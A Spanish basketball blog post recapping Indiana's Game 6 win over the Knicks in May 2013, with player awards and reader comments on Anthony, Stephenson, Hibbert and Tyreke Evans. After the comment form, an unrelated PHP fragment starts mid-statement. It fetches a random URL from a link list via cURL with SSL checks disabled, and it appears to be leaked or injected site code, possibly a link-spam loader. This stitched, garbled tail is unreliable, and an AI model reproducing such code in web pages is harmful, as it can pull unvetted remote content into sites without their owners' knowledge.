La Crónica: La visión de Larry

19 de May de 2013 por MagicJohnson32

lance stephensonTenía que ser Lance Stephenson, un chaval de Brooklyn en el que Larry Bird detectó un talento especial cuando lo eligió en el draft de 2010 (el mismo de Paul George) pero que hasta hace unos días era más célebre por su amenazador gesto hacia el banquillo de los Heat en los Playoffs del año pasado que por cualquier cosa relacionada con el baloncesto. Las circunstancias -la lesión de Danny Granger- le han situado en el foco, y Stephenson ha brillado cuando más le necesitaban los Pacers, en un sexto partido de segunda ronda que sirvió a Indiana para sellar su regreso a las finales de Conferencia nueve años después. Es un buen momento para reivindicar el papel jugado por Bird, Donnie Walsh y Kevin Pritchard en la ejemplar remodelación de este equipo.

En la primera posesión del partido, Stephenson atacó el aro y anotó una canasta que fueron más que dos puntos: fue una declaración de intenciones, un aviso de lo que vendría después. El talento y la agresividad reconducida del neoyorquino representaron aquello que los Knicks han echado en falta de JR Smith, negado desde su sanción por golpear a Terry en primera ronda e incapaz de superar el 40% en tiros en los ocho partidos jugados desde entonces. Aun así, Carmelo Anthony e Iman Shumpert casi obran el milagro. Los Pacers controlaron el juego durante toda la primera mitad y llegaron a situarse 12 arriba a los pocos minutos de iniciarse el tercer periodo. Tres triples seguidos de Shumpert, seguidos por otro de Smith, igualaron el marcador, que permaneció así hasta que se llegó al punto de inflexión definitivo: con 5 minutos por jugarse y los Knicks 2 arriba, Melo superó a George y se disponía a finalizar con un mate cuando apareció, casi de la nada, Roy Hibbert, inmenso toda la velada pero nunca tanto como en ese preciso momento. El gigante de los Pacers colocó su quinto tapón de la noche y los locales, con Stephenson como punta de lanza, lograron un parcial de 9-0 del que los Knicks no lograron recuperarse (99-106).

Los Knicks cierran su temporada de una manera decepcionante, con la sensación de no haber dado lo mejor de sí mismos en una eliminatoria en la que se han visto inferiores. Ése es, precisamente, el mérito de los Pacers, que a partir del miércoles volverán a enfrentarse a los Heat tras la intensa serie disputada hace un año.

hibbert meloPREMIOS

MVP: La actividad frenética de Stephenson y la presencia muchas veces silenciosa pero siempre amenazadora de Hibbert fueron la base sobre la que se construyó el triunfo de los Pacers. El pívot firmó 21 puntos, 12 rebotes (6 de ataque), 2 asistencias y 5 tapones, entre ellos uno crucial a Melo que pasará a la historia de la franquicia; por su parte, el escolta logró la máxima anotación de su carrera, 25 puntos, a los que sumó 10 rebotes y 3 asistencias.

La sorpresa: Stephenson, quién si no. Le sabíamos capaz de contribuir, pero anoche hizo mucho más que eso. Lideró a su equipo en anotación, anotó las canastas más críticas y realizó un sensacional ejercicio de autoconfianza.

La decepción: A estas alturas ya no esperábamos nada de Kidd, pero Raymond Felton venía jugando unos buenos Playoffs y su desaparición de anoche fue sangrante. Falló sus 7 tiros a canasta y se quedó en 2 puntos en los 33 minutos que jugó.

Mayor esfuerzo en vano: Poco que reprochar al Melo Anthony de anoche. Metió 39 puntos, por primera vez en estos Playoffs anotó más del 50% de sus tiros de campo (15 de 29), acertó con sus 8 tiros libres, atrapó 7 rebotes y dio 2 asistencias. Con el pésimo nivel ofrecido por Chandler, Felton, JR o Kidd, bastante hizo con mantener vivo a su equipo hasta el final.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    El esfuerzo defensivo de Carmelo fue nulo, en el resumen de ESPN, tres canastas que regala, dos a George y una a Stephenson. Por primera vez pasa del 50% en tiros de campo, dice mucho de lo pésimo que ha sido.

    Para mi Carmelo Anthony no puede ser el único jugador franquicia en un equipo. Si son dos juntos, como por ejemplo Westbrook-Durant, pues vale, pero como único… no vale.

      Citar

  2. Sancho88 dice:
    #2

    Ayer Felton lo hizo mal, eso es cierto. NY pierde 5 balones clave en los últimos 7 minutos que le cuestan la derrota cuando tenía el partido más o menos controlado (o, al menos, empatado). Fue un malísimo movimiento de Mike Woodson, ya que bajo la dirección de Prigioni el equipo tenía mucho más sentido, los aleros se movían para recibir y recibían en posiciones cómodas, y, sin embargo, con Felton en la cancha, el ataque se nubló, Indiana adelantó filas para presionar a media pista y NY, además de perder balones estúpidos (no solo Felton fue culpable, tb Melo perdió alguno muy tonto), empezó a permitir 1×1 de Stephenson y canastas muy fáciles de West y Hibbert.

    Muchas veces se dice en el basket que si no tienes base y no tienes pívot estás perdido. Pues bien, ayer NY tuvo de todo, incluso un JR que a pesar de estar más mamado que Paul Gascoigne, al menos dio la cara y se animó un pelín en el tercer cuarto.

    El que fue una desgracia humana fue Tyson Chandler. Eliminado por faltas y no defendió un carajo. Hibbert le ha hecho de todo en esta eliminatoria. Kenyon Martin estuvo más voluntarioso, aunque tampoco puede marcar diferencias, su físico ya no es lo que era y repito, ante Hibbert era imposible.

    No se´, NY puede sacar conclusiones positivas y otras negativas. Primero tiene que aclararse con el sistema de juego. El small ball lo juegan de puta madre, pero con defensas presionantes al hombre y ayudas al playmaker se nublan, y tienen que aprender a defender a los grandes de los equipos rivales y, sinceramente, Chandler ha sido la gran decepción de la eliminatoria en ese aspecto.

    Conclusiones positivas, obviamente Iman Shumpert, que ha jugado unos playoffs impresionantes, y Chris Copeland, que para el estilo de juego de NY viene muy bien.

    Carmelo hizo lo que pudo, pero estos Pacers han dado un paso cualitativo tanto atrás como delante con respecto al año pasado. El papel que juega George Hill es impresionante, el físico como equipo es mil veces mejor que el de los Knicks y, sobre todo, se acabó la mierda esa del extra pass del año pasado. Ahora todos pueden generarse sus propios tiros (Hill, Stephenson, George y West), y a Hibbert encontrarle en posiciones cómodas debido a los buenos cortes hacia canasta del resto y a que West juega comodísimo a 6 metros de canasta.

    La verdad, Indiana tiene opciones en las finales. No digo que vayan a eliminar a Miami, pero que si en el Oeste nos están molando los Grizzlies, creo que Indiana se merece un reconocimiento a su gran juego colectivo.

      Citar

  3. Vader dice:
    #3

    Igual que Durant que sin Westbrook no puede pasar de ronda… Suficiente hizo Melo aguantando él sólo al equipo toda la primera parte.

    Los Knicks han llegado muy justos de fuerzas a los playoffs, sobretodo por dentro. Chandler físicamente no está bien, Stat sobra decirlo, R.Wallace retirado, Camby lo mismo… Aún suerte del fichaje de Martin.

    Temporada muy buena de los Knicks y ahora hay que seguir trabajando para poder rodear mejor a Carmelo que es sin duda la piedra angular del proyecto.

    Saludos

      Citar

  4. Sancho88 dice:
    #4

    “Muchas veces se dice en el basket que si no tienes base y no tienes pívot estás perdido. Pues bien, ayer NY tuvo de todo, incluso un JR que a pesar de estar más mamado que Paul Gascoigne, al menos dio la cara y se animó un pelín en el tercer cuarto.”

    Perdón, quise decir lo contrario, que les faltó una buena aportación de bases-pivots, y que solo jugaron bien los exteriores

      Citar

  5. Vader dice:
    #5

    Por cierto el doble o más de faltas pitadas a Knicks que a Pacers….

      Citar

  6. Sancho88 dice:
    #6

    Y ya termino, el físico de Paul George le tapa algunos defectos técnicos o de calidad que quizá no es de los mejores de la liga, pero en líneas generales, mientras le acompañe el físico a este chico será uno de los mejores aleros de la liga

      Citar

  7. Sancho88 dice:
    #7

    Por cierto, y ya que pones Magic lo de Bird. No sé si he leido bien, pero le han pedido volver como GM a los Pacers no? De ser así, mucho ojito a estos Pacers. Realmente tienen todo para aspirar al campeonato

      Citar

  8. Sancho88 dice:
    #8

    Por cierto, dicen que no van a amnistiar a Kendrick Perkins. Si yo fuera los Kings, intentaría un traspaso RW+Perkins x Evans+Cousins. Después, a draftear a Alex Len, y a ver qué se puede hacer por Monta Ellis, que es agente libre y los Kings están interesados.

    RW-Ellis-Salmons-Thompson-Len

    Con Isaiah Thomas, Douglas, Thornton, Patterson de suplentes.

    Y los Thunder quedarían:

    Jackson-Tryeke-Durant-Ibaka-Cousins

    Joder…. no me digais que no queda un equipo de puta madre

      Citar

  9. Jose Luis dice:
    #9

    Evans y Jackson no son buenos tripleros… veo congestión en la zona, donde Cousins debe meter sus puntos y Durant empujar con sus penetraciones.

    Vader, igual que dices que Durant no puede pasar de ronda sin Westbrook, digo que Carmelo, sin otro jugador franquicia al lado, no puede echarse un equipo a las espaldas. Aquel año que Denver llegí a fnales de Conferencia contra Lakers, Billups tuvo una aportación extraordinaria. Carmelo no vale como único jugador franquicia.

      Citar

  10. Sancho88 dice:
    #10

    Ah, y para rizar aún el rizo, que los Kings incluyan a Thornton en el traspaso y los Thunder a Perry Jones, que hacen falta aleros en Sacramento.

    Vale que RW se iría, pero creo que sería una potra para ellos quitarse de en medio el contrato de Perkins, que no lo quiere absolutamente nadie, y además recibir a cambio a Tyreke, Thornton y Cousins. Joder, sería beneficioso para Thunder, y así le darían los mandos de la nave a Reggie Jackson, que ha demostrado que se lo merece, y Evans ayuda en la dirección.

    Evans es un gran defensor, ha mejorado que te cagas desde fuera, y tiene que seguir mejorando, roba muy bien, rebotea muy bien y distribuye juego. Dicen que es un chupón, pero las 5 asistencias por partido te las puede dar, no está tan mal para un combo guard no?

      Citar

  11. MagicJohnson32 dice:
    #11

    Evans es un bluf. Ale, ya lo he dicho.

      Citar

  12. melo15 dice:
    #12

    Evans hizo 20-5-5 en su temporada rookie, y si le das 30 minutos 17pp 5r y 5asistencias te las da seguro.

      Citar

  13. HisRoyalAirness dice:
    #13

    melo15:
    Evans hizo 20-5-5 en su temporada rookie, y si le das 30 minutos 17pp 5r y 5asistencias te las da seguro.

    Este año le dieron 31 minutos y no llegó a esos números. Emeka Okafor hizo 15-10 en su año rookie y no por eso deja de ser un pedazo de escoria. No todo son los números.

    Y lo de Melo es como lo de Durant, no vale criticar a uno y decir que el otro estaba muy solo.

    Y sí que vuelve Larry, lo dijeron ayer en ESPN. Casi confirmado

      Citar

  14. Simon dice:
    #14

    MagicJohnson32:
    Evans es un bluf. Ale, ya lo he dicho.

    Exacto, pero mucha gente aún le tiene fe… Es un “one hit wonder” del basket en toda regla.

    melo15:
    Evans hizo 20-5-5 en su temporada rookie, y si le das 30 minutos 17pp 5r y 5asistencias te las da seguro.

    De acuerdo… pero olvidas decir con un espectacular 23% en el tiro, 6 pérdidas y el balón sudao de tanto sobarlo.

      Citar

  15. Sancho88 dice:
    #15

    Bueno, yo no soy un defensor de Tyreke Evans, pero creo que sí soy el que más partidos le ha visto de aquí. Sinceramente, estais siendo totalmente injustos con él. No es un paquete ni un bluf, ni mucho menos. Este año ha mejorada muchísmo sus porcentajes, es un jugador muy joven que tuvo problemas disciplinarios, problemas de fascitis, tobillos, etc. y solo el pasado verano estuvo sano para entrenar el tiro. Este año ya está entrenando de nuevo, tanto tiro como físico, y realmente, es uno de los mejores defensas de la liga, pero al jugar en un equipo de mierda no se le ve. Puede defender sin problemas a tipos de entre 1,85-2,05, su timing de salto es terrible, rebotea bien atrás, tapona, y roba, y sabe salir corriendo en transición. Eso sí, atrás es un poco lento en desplazamiento lateral. Le falta mejorar su IQ, pero este año ya ha tirado menos y con mejores porcentajes, así que lo está consiguiendo.

    Si sigue por esa senda, no se le puede considerar un pakete. En serio que me parece injusto que todos le metais tanta tanta caña. Tiene una de las mejores entradas a canasta de toda la liga, y en tiros libres no es tan malo. No sé, si es por actitud pasota, ahí sí merece un suspenso, pero le falta motivación. Está ahí con su chicle pasando de todo, ahí si que merece un suspenso. Pero no sé, un tio totalmente aprovechable con mogoyon de cualidades. Yo creo que en un equipo de playoffs fliparíamos con Tyreke

      Citar

  16. Sancho88 dice:
    #16

    48% en tiros de campo esta temporada, y 34% en triiples además. Joder, no son porcentajes de gran estrella, pero tampoco de pakete no creeis? y en triples sigue mejorando y puede llegar a ser un tirador fiable

      Citar

  17. Vader dice:
    #17

    HisRoyalAirness:

    Y lo de Melo es como lo de Durant, no vale criticar a uno y decir que el otro estaba muy solo.

    Menos mal, pensaba que era el único que lo pensaba…

      Citar

  18. nba dice:
    #18

    Yo a Evans lo quiero en los Lakers …,
    ya esta todo dicho

      Citar

  19. GreenPride dice:
    #19

    Final de la temporada para los Knicks. En este partido han vuelto a evidenciar una inferioridad por dentro que al final es la que les ha costado la eliminación. El margen reboteador y la sensación de superioridad física interior de los Pacers ha sido brutal toda la serie y ha obligado a los Knicks a vivir de la línea de 3 y de Melo y ninguno de los dos han acabado de funcionar del todo bien ante la presión de los de Indiana. Precisamente han ido a caer en el mejor partido de lejos de Melo y en un día en el que gracias a los triples dieron la vuelta a una situación límite con 12 abajo en el tercer cuarto. Gracias a Melo y los triples de Shumpert, Copeland y JR volvieron al partido sólo para ahogarse de nuevo ante el mayor número de recursos y la fuerza de los Pacers.
    Estas series han encumbrado a Hibbert que ha hecho muchísimo daño a los Knicks y ha servido para mostrar el camino de lo que deben hacer los Pacers ante los Heat en la próxima eliminatoria. Meter balones dentro y desde ahí aprovechar las ventajas. Con una gran defensa en general y con un Stephenson en estado de gracia los Pacers han dado la puntilla a unos Knicks demasiado limitados. Veremos si ahora son capaces de vencer sus propias limintaciones ante los campeones Heat en las finales de conferencia

      Citar

  20. MagicJohnson32 dice:
    #20

    Sancho, cuando digo que Tyreke es un bluf, me refiero precisamente a que tiene un montón de cualidades (no hay más que recordar su año rookie) y no las aprovecha. Lleva 4 temporadas, y cada año promedia menos puntos y menos asistencias que la temporada anterior. 4 años seguidos anotando y asistiendo menos que el anterior es fuerte, eh. Un bluf hasta que se demuestre lo contrario.

      Citar

  21. Vader dice:
    #21

    Si los Pacers pierden tantos balones en la serie contra Miami como en la que hemos visto contra Knicks, no tendrán ninguna opción… Tienen que cuidar mejor el balón y explotar por dentro su superioridad.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>